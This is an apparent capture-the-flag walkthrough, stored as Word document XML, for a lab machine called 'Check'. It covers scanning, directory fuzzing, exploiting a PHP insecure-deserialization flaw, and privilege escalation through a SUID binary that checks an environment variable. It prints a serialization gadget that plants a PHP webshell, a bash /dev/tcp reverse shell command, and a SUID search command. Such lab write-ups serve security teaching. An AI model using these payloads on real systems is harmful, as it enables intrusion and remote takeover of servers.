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md5x29xlq8d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9qtkt0xqdms6" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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CHECKmachine.If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 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89zbkodu8sk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Nmap Scan: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first step, we need to determine which services are running in the background and which ports are open. Therefore, we will use a tool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observed the presence of port 80 hosting a web service and port 22 corresponding to SSH.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web application, we observed that it is a template of a website about a music band, with an apparently static structure and no visible dynamic functionality.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application appears to have no visible functionality, we can adopt another approach by performing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identify relevant files or directories that may be present on the server.</w:t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47900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fuzzing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fuzz-Bo0oM.txt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wordlist from SecLists, we identified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It is possible to download it, extract its contents, and open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contact.php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VSCode to facilitate code reading and analysis.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analyzing the code, we can quickly identify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insecure deserialization vulnerability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variable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$check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deserialized directly from user input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$_GET['check']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Since we have control over the properties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class, it is possible to manipulate the value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$send_file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define an arbitrary path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$message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insert malicious content, thus allowing us to overwrite or create files on the server.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this vulnerability, we can create a gadget that will save our webshell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wshell.php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the root directory of the application, allowing remote code execution (RCE). The following code manipulates the properties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class to define the webshell path and insert malicious PHP code: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class Send {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public $send_file = "../../../../../var/www/html/wshell.php";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public $message = "&lt;?php system(\$_GET[0]); ?&gt;";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public function __destruct() {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file_put_contents(__DIR__ . '/' . $this-&gt;send_file, $this-&gt;message, FILE_APPEND);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$payload = new Send();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$payload-&gt;send_file;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$payload-&gt;message;</w:t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echo urlencode(serialize($payload));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then access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contact.php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insert our payload into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query string.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60700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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completing this step, we can access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/wshell.php?0=&lt;command-here&gt;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confirming that we have RCE, we can now obtain a reverse shell.</w:t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$reverse = "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'";</w:t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echo urlencode($reverse);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511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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establishing the reverse shell, we access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and obtain our first flag.</w:t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searching for binaries with the SUID permission using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find / -perm /4000 2&gt;/dev/null,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identified the binary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When executing it, the following message is returned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you are not root, sorry.</w:t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79500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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we do not have a clear understanding of how this binary works, we can transfer it to our local machine and perform reverse engineering analysis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allows us to examine the code and understand the behavior of the binary to identify possible vulnerabilities or relevant functionality.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machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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Server:</w:t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0" l="0" r="0" t="0"/>
            <wp:docPr id="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opening the binary in Ghidra, we navigate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Functions → main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allows us to view the source logic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binary. After analysis, we identified that the binary checks the environment variable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i_am_root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If the variable is present, it grants access to a shell with root privileges. Otherwise, it displays the message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you are not root, sorry.</w:t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03600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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this behavior, we can define the environment variable using the command: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export i_am_root=1.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Then execute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binary again. This will grant us a shell with root privileges, allowing access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 and retrieval of the final flag.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headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="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All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o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6" name="image8.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic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D">
    <w:pPr>
      <w:jc w:val="center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1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Check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.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xm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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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jNuZiu/q3Dfeju3OgZBlYe6aw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC45cXRrdDB4cWRtczYyDmguNzg5emJrb2R1OHNrMg5oLjE3NWY1Y3M5NHowbzgAciExX3E3ak9najZ6RUxMUzZhNjBVbi1nWVRmeDJSQWhMQnU=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